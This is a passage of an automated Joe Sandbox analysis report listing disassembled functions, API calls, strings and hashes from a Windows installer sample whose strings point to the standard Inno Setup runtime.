                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                    • String ID: c:\directory$shell32.dll
                                                    • API String ID: 3376378930-1375355148
                                                    • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                    • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                    • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                    • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                    APIs
                                                    • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                    • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                    • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                    • API String ID: 4130936913-2943970505
                                                    • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                    • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                    • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                    • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                      • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                      • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                      • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                      • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                    • API String ID: 854858120-615399546
                                                    • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                    • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                    • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                    • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                    APIs
                                                    • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                    • OemToCharA.USER32(?,?), ref: 00423754
                                                    • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                    • String ID: 2$MAINICON
                                                    • API String ID: 3935243913-3181700818
                                                    • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                    • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                    • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                    • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                    • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                      • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                      • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                      • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                      • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                      • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                      • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                      • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                      • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                      • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                      • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                      • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                      • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                      • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                    • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                    • API String ID: 3864787166-2767913252
                                                    • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                    • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                    • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                    • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                    APIs
                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID:
                                                    • API String ID: 3887896539-0
                                                    • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                    • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                    • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                    • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                    APIs
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                    • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                    • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileNext
                                                    • String ID: p%G
                                                    • API String ID: 2066263336-2885399958
                                                    • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                    • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                    • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                    • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                    Strings
                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                    • PendingFileRenameOperations, xrefs: 00455728
                                                    • PendingFileRenameOperations2, xrefs: 00455758
                                                    • WININIT.INI, xrefs: 004557B8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                    • API String ID: 47109696-2199428270
                                                    • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                    • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                    • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                    • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                    • API String ID: 1375471231-2952887711
                                                    • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                    • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                    • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                    • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                    APIs
                                                    • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                    • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                    • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                    • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$EnumLongWindows
                                                    • String ID: TAB
                                                    • API String ID: 4191631535-3846439302
                                                    • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                    • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                    • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                    • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                    APIs
                                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressDeleteHandleModuleProc
                                                    • String ID: RegDeleteKeyExA$advapi32.dll
                                                    • API String ID: 588496660-1846899949
                                                    • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                    • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                    • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                    • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                    Strings
                                                    • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                    • NextButtonClick, xrefs: 0046BA6C
                                                    • Need to restart Windows? %s, xrefs: 0046BCB5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                    • API String ID: 0-2329492092
                                                    • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                    • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                    • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                    • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                    APIs
                                                    • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ActiveChangeNotifyWindow
                                                    • String ID: $Need to restart Windows? %s
                                                    • API String ID: 1160245247-4200181552
                                                    • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                    • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                    • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                    • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                    APIs
                                                      • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                    • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ChangeNotify$ErrorFullLastNamePath
                                                    • String ID: Creating directory: %s
                                                    • API String ID: 2451617938-483064649
                                                    • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                    • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                    • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                    • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
